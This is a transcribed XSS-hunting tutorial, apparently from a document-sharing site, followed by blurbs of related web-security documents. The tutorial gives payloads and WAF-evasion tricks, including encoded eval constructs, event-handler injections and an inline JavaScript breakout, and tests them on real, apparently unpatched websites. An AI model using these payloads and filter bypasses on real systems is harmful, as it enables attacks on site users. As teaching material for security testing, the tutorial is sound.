Finding XSS in Real World
|
|
- Owen West
- 8 years ago
- Views:
Transcription
1 Finding XSS in Real World by Alexander Korznikov 1 April 2015
2 Hi there, in this tutorial, I will try to explain how to find XSS in real world, using some interesting techniques. All of you know, that XSS is based on some code injection. It maybe <script> tag injection, or just an -alert()-, I will explain about that later. What do you need to find an XSS? Simply, only browser. But, if you want to find it much faster, you may use this software: 1. Firefox Browser 2. FireBug Add-on 3. HackBar Add-on 4. Google. I wanted to learn some advanced techniques of XSS, and found pretty cool way: There are tons of verified XSS s published by lot of security researchers, affecting VIP sites also. VIP website on xssposed.org is Google PR > 6 or Alexa Rate < So, I ve wrote a script that grabbed all xssposed.org XSS urls, and started to filter out not interesting fields. There were about 7500 urls. You can download a list from here: and filter out all you don t need. Real XSS (HTML Injection) Demo. I will take a real examples of XSSs from xssposed.org that were not patched a very, very long time. Our first target will be XSS report dated 14/06/2008. From that date, same XSS was reported more 3 times.
3 Take a look at the search field. Let s enter inside some RANDOMSTRING inside <xxx> tag. Purpose of this test is to validate, if there is some user input sanitation: <xxx>randomstring<xxx> As output, we see our RANDOMSTRING without <xxx> tags.
4 Let s take a look at the source: // CTRL+U in Firefox and Chrome As you can see, there is no filtration, and our <xxx> tag passed to browser as HTML. Purple color means that the <xxx> interpreted as tag. Finally, we enter: <script>alert(document.domain)</script>
5 One thing you should notice: there is no GET parameters in URL. In this example the POST was used. Open Hack-Bar add-on in Firefox, and after you come to search results, press Load URL and press on checkbox: Enable Post data Some server-side scripts, handle GET and POST requests the same way. Let s check it:
6 2. WAF Filter Evasions: What if the <script> tag is filtered out? Some WAF evasion cheat-sheets that we can use <script> tag, but I ve never seen this in real world. So I don t even try it. Some variations: <img src=x onerror=alert()> <img/src=x onerror= alert() > <svg onload=alert()> <svg/onload= alert() > <marquee onstart=alert()> <div style= width:1000px;height:1000px onmouseover=alert()>asdfa</div> <a onmouseover=alert()>some random text What if alert() is filtered? confirm() prompt() window[ alert ]( xss ) window['ale'+'rt']('xss') eval(window.atob('ywxlcnqoj3hzcycp')) //decode base64 string && execute eval(window['atob']('ywxlcnqoj3hzcycp')) window['e'+'v'+'a'+'l'](window['atob']('ywxlcnqoj3hzcycp')) Awesome evasion technique: []["filter"]["constructor"]( CODE )() eval( alert() ) will be equal to: []["filter"]["constructor"]( window['atob']('ywxlcnqoj3hzcycp') )() //equals to eval() And more evasion: []["fil"+"ter"]["constr"+"uctor"]( window['atob']('ywxlcnqoj3hzcycp') )() document.body += atob( PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+ ) //decoded base64 == <script>alert()</script> Some reference on []() functions: false =>![] true =>!![] undefined => [][[]] NaN => +[![]] 0 => +[] 1 => +!+[] 2 =>!+[]+!+[] 10 => [+!+[]]+[+[]] Array => [] Number => +[] String => []+[] Boolean =>![] Function => []["filter"] eval => []["filter"]["constructor"]( CODE )() window => []["filter"]["constructor"]("return this")()
7 Some security researchers go deeper, and develop tools like: That will convert your JavaScript CODE only with []()!+ characters. [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[]) Thanks to Patricio Palladino and Martin Kleppe. So you understand string manipulation like ale + rt Will not going to explain it again :) What if () characters are filtered? onerror=alert; throw xss document.body += string will append your string to the end of <body> tag. document.body += <script>alert\x28\x29</script> // in HEX: \x28 == ( and \x29 == ) Or you can encode the whole string <script>alert()</script> in HEX: document.body += \x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e Or just use your XSS as open redirect: document.location = //open redirect Again, document.location == document[ locati + on ]. Keep that in mind. As additional reference, I recommend to read this book: Simple HTML injections are easy to sanitize. Filter out tags and = characters, and it will be painful job of finding XSS. For example, Microsoft.NET 4 marking as Dangerous Request every request with character < followed by almost any ASCII character. I ve not found a way of evasion. So <s or <m or </ will be marked as dangerous. So the only way to bypass it is to use onmouseover=alert() > in case if = is not filtered out. ModSecurity doesn t know about confirm() Some others don t handle Unicode encoding and/or double URL encoding. If you can t use onload keyword, try onl%00oad or onl%u006fad or onl%256fad Or if = character is filtered or marked as dangerous, try onload%u003d //Null Byte / Unicode / Double URL //Unicode representation of = char Fine. This is over. Next, I will show you a real example of Inline JavaScript injection.
8 3. Inline JavaScript injection. The interesting thing, that this type of injection can be found on popular websites. Even if there a sanitation of tags, and equal character XSS is possible. If the logic of web-site (no matter if it s server-side or client-side), reflects user s input in web-page s javascript, we can utilize it for nasty purposes :) Simple example: We have URL: 1. Parameter id is handled by Server-Side logic, checking for INTEGER 2. Parameter style handled by client-side javascript and reflected in this context: var site.style = blue If we pass to the parameter style string: blue //single quote The context will be: var site.style = blue This will throw an javascript exception: SyntaxError: unterminated string literal Model: \string\trash\string\ blue //unclosed string In case of double quote, the query will be blue: SyntaxError: unterminated string literal In case if ID parameter handled by client-side, and reflected in context: var site.id = 1 Injected payload id=1 trash will look like: var site.id = 1 trash That will also throw an SyntaxError exception. In case if our payload will look like style=blue\ var site.style = blue\ Again, will be SyntaxError exception, because javascript interprets \ as escaped quote. So we can develop a noninvasive XSS locator: >trash\ single quote / double quote / space / greater sign / sting / backslash Some examples that this locator will break: //in case of no filtration HTML Code break: RED: Rendered as tags / BLUE: throwed out at the screen <a href= >trash\ style= blablabla > Javascript SyntaxErrors: RED: Syntax errors var a = blue >trash\ a=unescape( blue >trash\ ) var a = blue " >trash\
9 Sometimes web-site logic will escape or characters, so try to add to our locator \ \ >trash\ as result you may see: var a = blue\\ \\ >trash\ \ as input will be \\ as output, so our backslash is escaped, and quotation mark rendered. One more thing to remember, that we can perform all mathematical operations for all objects in javascript. For example, we can: ale + rt, or a - b or a * b. Google for more info :) Examples of nasty javascript injections with various payloads: var a = blue var a = blue - alert( xss ) - //alert() will be executed var b = [ red, blue,alert( xss ), ] var c = func( blue +alert(/xss/))//) //after // the rest of line will be commented Inline Javascript Real Demo. Our second target will be XSS report date: 28/06/2014 For making our life easier we will need FireBug and Hack-Bar Firefox addons. Entering our XSS locator ( >trash\) to the website s Find Jobs input field:
10 Got us to this URL: and as response we will get: As you can see in FireBug s output, thrown an exception - SyntaxError: missing } after property list. By clicking on the green URL right after the SyntaxError, we will get generated JavaScript source code: As you can notice, on lines 570 and 577 the code was broken: After server-side logic, out XSS locator looks like: ">trash\ So the and > tags are converted to HTML entities " > accordingly.
11 But the single quote is not converted, and only that broke the JavaScript code. Let s test for other useful characters () and enter this payload: -a()- Looks pretty good, characters aren t converted and passed to generated JavaScript. How JavaScript understands this payload? closes string, - subtracts results of a() function So, our final payload should look like: -alert( XSS )- and should not brake generated JavaScript execution. pwned again :) Ask & comment at That s all folks!
XSS Lightsabre techniques. using Hackvertor
XSS Lightsabre techniques using Hackvertor What is Hackvertor? Tag based conversion tool Javascript property checker Javascript/HTML execution DOM browser Saves you writing code Free and no ads! Whoo hoo!
More informationBypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant
Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant Nethemba All About Security Highly experienced certified IT security experts (CISSP, C EH, SCSecA) Core
More informationJavaScript: Introduction to Scripting. 2008 Pearson Education, Inc. All rights reserved.
1 6 JavaScript: Introduction to Scripting 2 Comment is free, but facts are sacred. C. P. Scott The creditor hath a better memory than the debtor. James Howell When faced with a decision, I always ask,
More informationA Tale of the Weaknesses of Current Client-side XSS Filtering
A Tale of the Weaknesses of Current Client-side XSS Filtering Sebastian Lekies (@sebastianlekies), Ben Stock (@kcotsneb) and Martin Johns (@datenkeller) Attention hackers! These slides are preliminary!
More informationNetwork Security Web Security
Network Security Web Security Anna Sperotto, Ramin Sadre Design and Analysis of Communication Systems Group University of Twente, 2012 Cross Site Scripting Cross Side Scripting (XSS) XSS is a case of (HTML)
More informationA Tale of the Weaknesses of Current Client-Side XSS Filtering
Call To Arms: A Tale of the Weaknesses of Current Client-Side XSS Filtering Martin Johns, Ben Stock, Sebastian Lekies About us Martin Johns, Ben Stock, Sebastian Lekies Security Researchers at SAP, Uni
More informationProject 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
More informationUniversal XSS via IE8s XSS Filters
Universal XSS via IE8s XSS Filters the sordid tale of a wayward hash sign slides: http://p42.us/ie8xss/ About Us Eduardo Vela Nava aka sirdarckcat http://sirdarckcat.net http://twitter.com/sirdarckcat
More informationProtection, Usability and Improvements in Reflected XSS Filters
Protection, Usability and Improvements in Reflected XSS Filters Riccardo Pelizzi System Security Lab Department of Computer Science Stony Brook University May 2, 2012 1 / 19 Riccardo Pelizzi Improvements
More informationCross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011
Cross Site Scripting (XSS) and PHP Security Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011 What Is Cross Site Scripting? Injecting Scripts Into Otherwise Benign and Trusted Browser Rendered
More informationCarlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea
Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea Bypass: History Explanation: What Is Going On Process: Things To Look For Demos: alert(1) Done Live (hopefully) CSP: Content Security
More information1 Web Application Firewalls implementations, common problems and vulnerabilities
Bypassing Web Application Firewalls Pavol Lupták Pavol.Luptak@nethemba.com CEO, Nethemba s.r.o Abstract The goal of the presentation is to describe typical obfuscation attacks that allow an attacker to
More informationWeb Application Attacks And WAF Evasion
Web Application Attacks And WAF Evasion Ahmed ALaa (EG-CERT) 19 March 2013 What Are We Going To Talk About? - introduction to web attacks - OWASP organization - OWASP frameworks - Crawling & info. gathering
More informationGovernment Girls Polytechnic, Bilaspur
Government Girls Polytechnic, Bilaspur Name of the Lab: Internet & Web Technology Lab Title of the Practical : Dynamic Web Page Design Lab Class: CSE 6 th Semester Teachers Assessment:20 End Semester Examination:50
More informationA talk by 13-06-2014,
A talk by 13-06-2014, http://en.wikipedia.org/wiki/monkey_test A researcher in uhr niversity ochum, A student of XSS who is working towards his PhD in XSS An XSSer / An XSS Enthusiast http://www.tubechop.com/watch/2670518
More informationBrowser tools that make web development easier. Alan Seiden Consulting alanseiden.com
Browser tools that make web development easier alanseiden.com My focus Advancing PHP on IBM i PHP project leader, Zend/IBM Toolkit Contributor, Zend Framework DB2/i enhancements Developer, Best Web Solution,
More informationWeb Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
More informationComplete Cross-site Scripting Walkthrough
Complete Cross-site Scripting Walkthrough Author : Ahmed Elhady Mohamed Email : ahmed.elhady.mohamed@gmail.com website: www.infosec4all.tk blog : www.1nfosec4all.blogspot.com/ [+] Introduction wikipedia
More informationIntrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
More informationDetecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework ajin25@gmail.com keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
More informationAttacks on Clients: Dynamic Content & XSS
Software and Web Security 2 Attacks on Clients: Dynamic Content & XSS (Section 7.1.3 on JavaScript; 7.2.4 on Media content; 7.2.6 on XSS) sws2 1 Recap from last lecture Attacks on web server: attacker/client
More informationDocument Structure Integrity: A Robust Basis for Cross-Site Scripting Defense
Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji Illinois Institute Of Technology Prateek Saxena UC Berkeley Dawn Song UC Berkeley 1 A Cross-Site Scripting Attack
More informationBug Report. Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca)
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
More informationExternal Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
More informationEVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
More informationTCP/IP Networking, Part 2: Web-Based Control
TCP/IP Networking, Part 2: Web-Based Control Microchip TCP/IP Stack HTTP2 Module 2007 Microchip Technology Incorporated. All Rights Reserved. Building Embedded Web Applications Slide 1 Welcome to the next
More informationHTTPParameter Pollution. ChrysostomosDaniel
HTTPParameter Pollution ChrysostomosDaniel Introduction Nowadays, many components from web applications are commonly run on the user s computer (such as Javascript), and not just on the application s provider
More informationAdvanced XSS. Nicolas Golubovic
Advanced XSS Nicolas Golubovic Image courtesy of chanpipat / FreeDigitalPhotos.net Today's menu 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course:
More informationIMRG Peermap API Documentation V 5.0
IMRG Peermap API Documentation V 5.0 An Introduction to the IMRG Peermap Service... 2 Using a Tag Manager... 2 Inserting your Unique API Key within the Script... 2 The JavaScript Snippet... 3 Adding the
More informationLogin with Amazon. Getting Started Guide for Websites. Version 1.0
Login with Amazon Getting Started Guide for Websites Version 1.0 Login with Amazon: Getting Started Guide for Websites Copyright 2016 Amazon Services, LLC or its affiliates. All rights reserved. Amazon
More informationClient-side Web Engineering From HTML to AJAX
Client-side Web Engineering From HTML to AJAX SWE 642, Spring 2008 Nick Duan 1 What is Client-side Engineering? The concepts, tools and techniques for creating standard web browser and browser extensions
More informationShort notes on webpage programming languages
Short notes on webpage programming languages What is HTML? HTML is a language for describing web pages. HTML stands for Hyper Text Markup Language HTML is a markup language A markup language is a set of
More informationCross Site Scripting Prevention
Project Report CS 649 : Network Security Cross Site Scripting Prevention Under Guidance of Prof. Bernard Menezes Submitted By Neelamadhav (09305045) Raju Chinthala (09305056) Kiran Akipogu (09305074) Vijaya
More informationEC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
More informationThe Past, Present and Future of XSS Defense Jim Manico. HITB 2011 Amsterdam
The Past, Present and Future of XSS Defense Jim Manico HITB 2011 Amsterdam 0 Jim Manico Managing Partner, Infrared Security Web Developer, 15+ Years OWASP Connections Committee Chair OWASP ESAPI Project
More informationOPENTABLE GROUP SEARCH MODULE GETTING STARTED ADD RESERVATIONS TO YOUR WEBSITE
ADD RESERVATIONS TO YOUR WEBSITE OPENTABLE GROUP SEARCH MODULE The group search module allows users to select a specific restaurant location from a list and search tables at that location. The code below
More informationBypassing Internet Explorer s XSS Filter
Bypassing Internet Explorer s XSS Filter Or: Oops, that s not supposed to happen. Carlos @RTWaysea About Me Mechanical Drafting Background Engine parts, Architectural fixtures, etc. Friend said Try This
More informationSecurity Research Advisory IBM inotes 9 Active Content Filtering Bypass
Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 7 Active Content Filtering Bypass Advisory
More informationXSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0. Author of OWASP Xenotix XSS Exploit Framework opensecurity.in
THE ULTIMATE XSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0 Ajin Abraham Author of OWASP Xenotix XSS Exploit Framework opensecurity.in The quick guide for developers to protect their web applications from
More informationUploaded images filter evasion for carrying out XSS attacks
February 25, 2007 Uploaded images filter evasion for carrying out XSS attacks Digitаl Security Research Group (DSecRG) Alexander Polyakov a.polyakov@dsec.ru http://dsecrg.ru Table of contents Introduction...3
More informationHTML Form Widgets. Review: HTML Forms. Review: CGI Programs
HTML Form Widgets Review: HTML Forms HTML forms are used to create web pages that accept user input Forms allow the user to communicate information back to the web server Forms allow web servers to generate
More informationWeb Development CSE2WD Final Examination June 2012. (a) Which organisation is primarily responsible for HTML, CSS and DOM standards?
Question 1. (a) Which organisation is primarily responsible for HTML, CSS and DOM standards? (b) Briefly identify the primary purpose of the flowing inside the body section of an HTML document: (i) HTML
More informationBlackbox Reversing of XSS Filters
Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net Introduction Web applications are the future Reversing web apps blackbox reversing very different environment and tools Cross-site scripting
More informationSQL Injection. The ability to inject SQL commands into the database engine through an existing application
SQL Injection The ability to inject SQL commands into the database engine through an existing application 1 What is SQL? SQL stands for Structured Query Language Allows us to access a database ANSI and
More informationUnraveling Unicode: A Bag of Tricks for Bug Hunting
Unraveling Unicode: A Bag of Tricks for Bug Hunting Black Hat USA July 2009 Chris Weber www.lookout.net chris@casabasecurity.com Casaba Security Can you tell the difference? How about now? The Transformers
More informationMASTERTAG DEVELOPER GUIDE
MASTERTAG DEVELOPER GUIDE TABLE OF CONTENTS 1 Introduction... 4 1.1 What is the zanox MasterTag?... 4 1.2 What is the zanox page type?... 4 2 Create a MasterTag application in the zanox Application Store...
More informationJavaFX Mashups. #javafxmashups. @gunnarsson: Martin Gunnarsson, Epsilon @per_siko: Pär Sikö, Jayway. fredag 26 oktober 12
JavaFX Mashups @gunnarsson: Martin Gunnarsson, Epsilon @per_siko: Pär Sikö, Jayway #javafxmashups Loading a web page Architecture Presentation Processing WebView WebEngine Simple web page public class
More informationVisualizing an OrientDB Graph Database with KeyLines
Visualizing an OrientDB Graph Database with KeyLines Visualizing an OrientDB Graph Database with KeyLines 1! Introduction 2! What is a graph database? 2! What is OrientDB? 2! Why visualize OrientDB? 3!
More informationJavaScript Testing. Beginner's Guide. Liang Yuxian Eugene. Test and debug JavaScript the easy way PUBLISHING MUMBAI BIRMINGHAM. k I I.
JavaScript Testing Beginner's Guide Test and debug JavaScript the easy way Liang Yuxian Eugene [ rwtmm k I I PUBLISHING I BIRMINGHAM MUMBAI loading loading runtime Preface 1 Chapter 1: What is JavaScript
More informationWeb App Development Session 1 - Getting Started. Presented by Charles Armour and Ryan Knee for Coder Dojo Pensacola
Web App Development Session 1 - Getting Started Presented by Charles Armour and Ryan Knee for Coder Dojo Pensacola Tools We Use Application Framework - Compiles and Runs Web App Meteor (install from https://www.meteor.com/)
More informationEVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS
EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS SEPTEMBER 2015 MAZIN AHMED MAZIN@MAZINAHMED.NET @MAZEN160 Table of Contents Topic Page Number Abstract 3 Introduction 3 Testing Environment 4 Products
More informationWebsite Login Integration
SSO Widget Website Login Integration October 2015 Table of Contents Introduction... 3 Getting Started... 5 Creating your Login Form... 5 Full code for the example (including CSS and JavaScript):... 7 2
More informationJavaScript Basics & HTML DOM. Sang Shin Java Technology Architect Sun Microsystems, Inc. sang.shin@sun.com www.javapassion.com
JavaScript Basics & HTML DOM Sang Shin Java Technology Architect Sun Microsystems, Inc. sang.shin@sun.com www.javapassion.com 2 Disclaimer & Acknowledgments Even though Sang Shin is a full-time employee
More informationStopping SQL Injection and. Manoranjan (Mano) Paul. Track: Operating Systems Security - Are we there yet?
Stopping SQL Injection and Crossing Over Cross-site Scripting Track: Operating Systems Security - Are we there yet? Manoranjan (Mano) Paul CISSP, MCSD, MCAD, CompTIA Network+, ECSA/LPT Catalyst(s) SQL
More informationCreating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
More informationCross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
More informationCracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
More informationDetect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map
Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map Erwin Adi and Irene Salomo School of Computer Science BINUS International BINUS University, Indonesia
More informationSecurity at Scale: Effective approaches to web application security. zane@etsy.com @zanelackey
Security at Scale: Effective approaches to web application security zane@etsy.com @zanelackey Who am I? Engineering Manager @ Etsy Lead appsec/netsec/seceng teams Formerly @ isec Partners Books/presentations
More informationExternal Network & Web Application Assessment. For The XXX Group LLC October 2012
External Network & Web Application Assessment For The XXX Group LLC October 2012 This report is solely for the use of client personal. No part of it may be circulated, quoted, or reproduced for distribution
More informationWeb Programming Step by Step
Web Programming Step by Step Lecture 13 Introduction to JavaScript Reading: 7.1-7.4 Except where otherwise noted, the contents of this presentation are Copyright 2009 Marty Stepp and Jessica Miller. Client-side
More informationFinding Your Way in Testing Jungle. A Learning Approach to Web Security Testing.
Finding Your Way in Testing Jungle A Learning Approach to Web Security Testing. Research Questions Why is it important to improve website security? What techniques are already in place to test security?
More informationInternetVista Web scenario documentation
InternetVista Web scenario documentation Version 1.2 1 Contents 1. Change History... 3 2. Introduction to Web Scenario... 4 3. XML scenario description... 5 3.1. General scenario structure... 5 3.2. Steps
More information«W3Schools Home Next Chapter» JavaScript is THE scripting language of the Web.
JS Basic JS HOME JS Introduction JS How To JS Where To JS Statements JS Comments JS Variables JS Operators JS Comparisons JS If...Else JS Switch JS Popup Boxes JS Functions JS For Loop JS While Loop JS
More informationTweetAttacks Pro. User Manual
TweetAttacks Pro User Manual The ultimate twitter auto follower, auto unfollower, tweet scraper, reply generator, auto retweeter, tweet spinner, mass retweeter and tweet scheduler with socialoomph integration.
More informationWebapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
More informationVisualizing a Neo4j Graph Database with KeyLines
Visualizing a Neo4j Graph Database with KeyLines Introduction 2! What is a graph database? 2! What is Neo4j? 2! Why visualize Neo4j? 3! Visualization Architecture 4! Benefits of the KeyLines/Neo4j architecture
More informationNext Generation Clickjacking
Next Generation Clickjacking New attacks against framed web pages Black Hat Europe, 14 th April 2010 Paul Stone paul.stone@contextis.co.uk Coming Up Quick Introduction to Clickjacking Four New Cross-Browser
More informationBypassing XSS Auditor: Taking Advantage of Badly Written PHP Code
Bypassing XSS Auditor: Taking Advantage of Badly Written PHP Code Anastasios Stasinopoulos, Christoforos Ntantogian, Christos Xenakis Department of Digital Systems, University of Piraeus {stasinopoulos,
More informationCIS 467/602-01: Data Visualization
CIS 467/602-01: Data Visualization HTML, CSS, SVG, (& JavaScript) Dr. David Koop Assignment 1 Posted on the course web site Due Friday, Feb. 13 Get started soon! Submission information will be posted Useful
More informationAJAX and JSON Lessons Learned. Jim Riecken, Senior Software Engineer, Blackboard Inc.
AJAX and JSON Lessons Learned Jim Riecken, Senior Software Engineer, Blackboard Inc. About Me Jim Riecken Senior Software Engineer At Blackboard for 4 years. Work out of the Vancouver office. Working a
More informationDynamic Web-Enabled Data Collection
Dynamic Web-Enabled Data Collection S. David Riba, Introduction Web-based Data Collection Forms Error Trapping Server Side Validation Client Side Validation Dynamic generation of web pages with Scripting
More informationWhat about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)
Security What about MongoDB? Even though MongoDB doesn t use SQL, it can be vulnerable to injection attacks db.collection.find( {active: true, $where: function() { return obj.credits - obj.debits < req.body.input;
More informationApplication Security Testing. Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il
Application Security Testing Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il Agenda The most common security vulnerabilities you should test for Understanding the problems
More informationJavaScript By: A. Mousavi & P. Broomhead SERG, School of Engineering Design, Brunel University, UK
Programming for Digital Media EE1707 JavaScript By: A. Mousavi & P. Broomhead SERG, School of Engineering Design, Brunel University, UK 1 References and Sources 1. DOM Scripting, Web Design with JavaScript
More informationRuby on Rails Security. Jonathan Weiss, 30.12.2007 Peritor Wissensmanagement GmbH
Ruby on Rails Security Jonathan Weiss, 30.12.2007 Peritor Wissensmanagement GmbH Who am I? Jonathan Weiss Consultant for Peritor Wissensmanagement GmbH Specialized in Rails, Scaling, and Code Review Active
More information(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
More informationCourse Information Course Number: IWT 1229 Course Name: Web Development and Design Foundation
Course Information Course Number: IWT 1229 Course Name: Web Development and Design Foundation Credit-By-Assessment (CBA) Competency List Written Assessment Competency List Introduction to the Internet
More informationCheck list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
More informationCTF Web Security Training. Engin Kirda ek@ccs.neu.edu
CTF Web Security Training Engin Kirda ek@ccs.neu.edu Web Security Why It is Important Easiest way to compromise hosts, networks and users Widely deployed ( payload No Logs! (POST Request Difficult to defend
More informationStep One Check for Internet Connection
Connecting to Websites Programmatically with Android Brent Ward Hello! My name is Brent Ward, and I am one of the three developers of HU Pal. HU Pal is an application we developed for Android phones which
More informationjquery Tutorial for Beginners: Nothing But the Goods
jquery Tutorial for Beginners: Nothing But the Goods Not too long ago I wrote an article for Six Revisions called Getting Started with jquery that covered some important things (concept-wise) that beginning
More informationInstructions for Embedding a Kudos Display within Your Website
Instructions for Embedding a Kudos Display within Your Website You may use either of two technologies for this embedment. A. You may directly insert the underlying PHP code; or B. You may insert some JavaScript
More informationCustomising Your Mobile Payment Pages
Corporate Gateway Customising Your Mobile Payment Pages V2.0 May 2014 Use this guide to: Understand how to customise your payment pages for mobile and tablet devices XML Direct Integration Guide > Contents
More informationYandex.Widgets Quick start
17.09.2013 .. Version 2 Document build date: 17.09.2013. This volume is a part of Yandex technical documentation. Yandex helpdesk site: http://help.yandex.ru 2008 2013 Yandex LLC. All rights reserved.
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationWeb Application Security
Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching
More informationPhishing by data URI
Phishing by data URI Henning Klevjer henning@klevjers.com October 22, 2012 1 Abstract Historically, phishing web pages have been hosted by web servers that are either compromised or owned by the attacker.
More informationExample. Represent this as XML
Example INF 221 program class INF 133 quiz Assignment Represent this as XML JSON There is not an absolutely correct answer to how to interpret this tree in the respective languages. There are multiple
More information25 Million Flows Later - Large-scale Detection of DOM-based XSS
25 Million Flows Later - Large-scale Detection of DOM-based XSS Sebastian Lekies SAP AG sebastian.lekies@sap.com Ben Stock FAU Erlangen-Nuremberg ben.stock@cs.fau.de Martin Johns SAP AG martin.johns@sap.com
More informationNewsletterAdmin 2.4 Setup Manual
NewsletterAdmin 2.4 Setup Manual Updated: 7/22/2011 Contact: corpinteractiveservices@crain.com Contents Overview... 2 What's New in NewsletterAdmin 2.4... 2 Before You Begin... 2 Testing and Production...
More information25 Million Flows Later Large- scale Detec6on of DOM- based XSS. Published at ACM CCS 2013 Sebas5an Lekies, Ben Stock, Mar6n Johns
25 Million Flows Later Large- scale Detec6on of DOM- based XSS Published at ACM CCS 2013 Sebas5an Lekies, Ben Stock, Mar6n Johns Me, myself and I Dr. Martin Johns Background in software engineering Academic
More informationPrecise client-side protection against DOM-based Cross-Site Scripting
Precise client-side protection against DOM-based Cross-Site Scripting Ben Stock FAU Erlangen-Nuremberg ben.stock@cs.fau.de Patrick Spiegel SAP AG patrick.spiegel@sap.com Sebastian Lekies SAP AG sebastian.lekies@sap.com
More informationAdvanced Web Development SCOPE OF WEB DEVELOPMENT INDUSTRY
Advanced Web Development Duration: 6 Months SCOPE OF WEB DEVELOPMENT INDUSTRY Web development jobs have taken thе hot seat when it comes to career opportunities and positions as a Web developer, as every
More information1. Building Testing Environment
The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,
More informationInput Validation Vulnerabilities, Encoded Attack Vectors and Mitigations OWASP. The OWASP Foundation. Marco Morana & Scott Nusbaum
Input Validation Vulnerabilities, Encoded Attack Vectors and Mitigations Marco Morana & Scott Nusbaum Cincinnati Chapter September 08 Meeting Copyright 2008 The Foundation Permission is granted to copy,
More informationJavaScript Security. John Graham Cumming
JavaScript Security John Graham Cumming Living in a powder keg and giving off sparks JavaScript security is a mess The security model is outdated Key examples AGacking DNS to agack JavaScript What are
More informationHow to Create an HTML Page
This is a step-by-step guide for creating a sample webpage. Once you have the page set up, you can add and customize your content using the various tags. To work on your webpage, you will need to access
More informationDebugging JavaScript and CSS Using Firebug. Harman Goei CSCI 571 1/27/13
